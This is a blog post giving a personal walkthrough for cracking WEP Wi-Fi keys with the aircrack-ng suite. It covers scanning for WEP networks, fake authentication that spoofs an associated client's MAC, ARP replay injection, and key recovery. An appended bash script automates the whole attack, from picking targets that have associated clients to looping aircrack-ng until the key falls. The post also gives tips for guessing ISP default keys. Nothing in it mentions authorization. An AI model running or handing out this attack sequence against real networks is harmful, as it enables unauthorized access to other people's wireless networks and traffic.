My Method for cracking WEP

Friday, October 19, 2012 Posted by Unknown

There are hundreds if not thousands of guides out there on how to crack WEP. This is mostly a quick and dirty reference for a few friends trying to crack WEP themselves.

Aircrack-ng's guide to cracking WEP

Download and boot BackTrack 5 R3. To install it on a flash drive, use the Linux/Windows tool YUMI.

First you want to see which Wi-Fi networks are in range. Put your wireless interface in monitor mode and list only the WEP networks:

#airmon-zc start wlan0
#airodump-ng --encrypt wep mon0

You should see several APs. Record the BSSID, ESSID and channel of each, along with any associated clients shown in the station list at the bottom of the airodump-ng screen; you will need a client MAC for the injection steps below.

Once you find a couple of targets on the same channel, close airodump-ng and stop the monitor interface:

#airmon-zc stop mon0

Start airmon-zc again, locked to the channel of the target. (Locking the channel matters less for WEP than it does for catching a WPA handshake, but airodump-ng and aireplay-ng both have to sit on the target's channel for injection to work, so lock it anyway.)

#airmon-zc start wlan0 <Channel Number>

Then start airodump-ng on the same channel and write the capture to disk:

#airodump-ng mon0 --encrypt wep --write <FILENAME> --output-format pcap -a --channel <Channel number>

Do not add --ivs to this command: --ivs and --output-format pcap are mutually exclusive in airodump-ng. If you only want the IVs, use --ivs on its own and you get a smaller <FILENAME>-01.ivs, which aircrack-ng reads just as well as a .cap. The -a option hides stations that are not associated with any AP.


Now you need the access point to accept frames from you. Fake authentication (-1) associates your card with the AP using the MAC address of a client that is already associated. It does not produce IVs by itself; it only keeps the AP willing to accept the packets you inject in the next step.

#aireplay-ng mon0 -1 0 -e "essid" -a <access point MAC address> -h <MAC address of an associated client>

If the AP keeps dropping the association (see the failure output below), tweak the timing: re-authenticate every N seconds, send -o packets per burst and a keep-alive every -q seconds.

#aireplay-ng mon0 -1 <a number between 30-6000> -o <a number between 1-30> -q 10 -e "essid" -a <access point MAC address> -h <MAC address of an associated client>



Success looks like this (output taken from http://www.aircrack-ng.org):
18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# and so on.
Here is an example of what a failed authentication looks like. The "Got a deauthentication packet!" line followed by endless retries means the AP is not keeping you associated (MAC filtering is the usual cause); do not move on to injection until fake authentication is stable:
18:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request


You can also run the ARP request replay attack (-3), either alongside the fake authentication or, when you are spoofing the MAC of a client that is already associated, instead of it. This is the step that actually generates IVs: aireplay-ng waits for an ARP request on the network and replays it to the AP over and over, and every reply the AP sends carries a fresh IV.

#aireplay-ng mon0 -3 -b <MAC address of Access point> -h <MAC address of associated client>


Here is what the screen looks like when ARP requests are being injected:
 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...


Now to crack the key from the IVs you have captured. There are a lot of options at this point. For example, AT&T U-verse default WEP keys are digits only, and Verizon FiOS keys use the hex characters 0-9A-F. Doing some homework on a default SSID can lead to a much quicker crack.


Static WEP cracking options:
-c     Search alpha-numeric characters only.

-t      Search binary coded decimal characters only.

-n <nbits>
Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc., until 512 bits of length. The default value is 128.

-f <fudge>
By default, this parameter is set to 2. Use a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.

-k <korek>
There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.


#aircrack-ng <any static WEP cracking options above> <FILENAME>-01.cap

airodump-ng numbers its output files, so the capture started above is <FILENAME>-01.cap (or <FILENAME>-01.ivs if you used --ivs). If the capture holds more than one network, aircrack-ng asks which one to crack and shows how many IVs it has for each. If there are not enough yet, leave the injection running and try again later; the default PTW attack typically needs on the order of 20,000 IVs for a 40-bit key and 40,000 or more for a 104-bit key.
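As an added example (not the post's own code, nor anything shipped with aircrack-ng), here is the whole sequence above as one script, plus a helper that picks WEP targets with associated clients out of the CSV that airodump-ng writes with --output-format csv. The sample CSV embedded in it is constructed, and the function names, the pcap,csv output choice and the assumption that aircrack-ng exits 0 once it finds the key are mine:

```bash
#!/bin/bash
# Added example, not from the original post: the monitor -> capture ->
# fake-auth -> ARP-replay -> crack sequence as one script, plus a helper
# that picks WEP targets with associated clients out of an airodump-ng
# CSV dump (--output-format csv). Function names, the sample CSV and the
# assumption that aircrack-ng exits 0 once it finds the key are mine;
# aircrack-ng 1.x tools, root and an injection-capable card are assumed.
set -u

# Print "BSSID CHANNEL ESSID" for every WEP AP in an airodump-ng CSV (read
# from stdin) that has at least one associated station. The file holds two
# tables: AP rows (channel in column 4, Privacy in 6, ESSID in 14), then
# "Station MAC" rows whose column 6 is the BSSID the station is joined to.
pick_targets() {
    awk -F', *' '
        /^BSSID/       { table = "ap";  next }
        /^Station MAC/ { table = "sta"; next }
        NF < 2         { next }
        table == "ap"  && $6 ~ /WEP/   { chan[$1] = $4; essid[$1] = $14 }
        table == "sta" && ($6 in chan) { seen[$6] = 1 }
        END { for (b in seen) printf "%s %s %s\n", b, chan[b], essid[b] }
    '
}

# Constructed airodump-ng CSV: two WEP APs on channel 6 with clients, one
# WEP AP with no client, one WPA2 AP with a client, one unassociated station.
sample_csv() {
    cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2012-10-19 18:00:01, 2012-10-19 18:05:30,  6,  54, WEP , WEP, , -40,   120,   3500,   0.  0.  0.  0,   7, linksys,
00:66:77:88:99:AA, 2012-10-19 18:00:02, 2012-10-19 18:05:30,  6,  54, WEP , WEP, , -55,    98,    412,   0.  0.  0.  0,   8, 2WIRE123,
00:BB:CC:DD:EE:01, 2012-10-19 18:00:03, 2012-10-19 18:05:30, 11,  54, WEP , WEP, , -70,    40,      0,   0.  0.  0.  0,   5, attic,
00:BB:CC:DD:EE:02, 2012-10-19 18:00:04, 2012-10-19 18:05:30,  6,  54, WPA2, CCMP, PSK, -45,   110,      0,   0.  0.  0.  0,   6, secure,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2012-10-19 18:00:05, 2012-10-19 18:05:30, -50,   400, 00:11:22:33:44:55,
AA:BB:CC:DD:EE:02, 2012-10-19 18:00:06, 2012-10-19 18:05:30, -60,    80, 00:66:77:88:99:AA, 2WIRE123
AA:BB:CC:DD:EE:03, 2012-10-19 18:00:07, 2012-10-19 18:05:30, -48,   300, 00:BB:CC:DD:EE:02,
AA:BB:CC:DD:EE:04, 2012-10-19 18:00:08, 2012-10-19 18:05:30, -80,     3, (not associated), linksys
EOF
}

# The attack sequence from the post against one target. Not run by the
# checks below: it needs root, an injection-capable card and a live AP.
wep_attack() {
    local iface="$1" chan="$2" bssid="$3" client="$4" essid="$5" prefix="$6"
    airmon-zc start "$iface" "$chan" >/dev/null
    # airodump-ng numbers its files, so the capture lands in ${prefix}-01.cap
    airodump-ng mon0 --encrypt wep --channel "$chan" --bssid "$bssid" \
        --write "$prefix" --output-format pcap,csv >/dev/null 2>&1 &
    local dump_pid=$!
    sleep 5
    # Fake auth keeps the spoofed client MAC associated so the AP accepts
    # our frames; it generates no IVs on its own.
    aireplay-ng -1 6000 -o 1 -q 10 -e "$essid" -a "$bssid" -h "$client" mon0 \
        >/dev/null 2>&1 &
    local auth_pid=$!
    # ARP request replay is what actually produces the IVs.
    aireplay-ng -3 -b "$bssid" -h "$client" mon0 >/dev/null 2>&1 &
    local arp_pid=$!
    # Re-run the crack every minute as IVs accumulate (assumes aircrack-ng
    # exits 0 once a key is found and non-zero otherwise).
    until aircrack-ng -q -b "$bssid" "$prefix"-*.cap; do
        sleep 60
    done
    kill "$auth_pid" "$arp_pid" "$dump_pid" 2>/dev/null
    airmon-zc stop mon0 >/dev/null
}

# Stand-alone usage:
#   ./wep.sh targets dump-01.csv
#   ./wep.sh attack wlan0 6 00:11:22:33:44:55 AA:BB:CC:DD:EE:01 linksys dump
case "${1:-}" in
    targets) pick_targets < "$2" ;;
    attack)  shift; wep_attack "$@" ;;
esac
```

Run the targets step against the CSV from a channel-hopping airodump-ng session first; it only lists WEP networks that have a station to spoof, which is exactly what the -h option in the fake-auth and ARP-replay commands needs.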

I only use the -f 1 option to get keys that are too easy and would otherwise be thrown out as false positives, e.g. 123456789 or 111111111.

And remember: a few quick Google searches on the SSID (if it is a default SSID) can save you a lot of time.

Side note: if you run:

#iwconfig wlan0

and the Tx-Power shown is not right for your gear, you can change it with:

#iwconfig wlan0 txpower <dBm>

The value is in dBm (e.g. txpower 30); the driver and your regulatory domain cap what you can actually set.


This is not a complete guide to everything you can do. It's just what I do, and it has a high success rate. If you have any questions feel free to drop me an e-mail/Gtalk at init6@init6.me
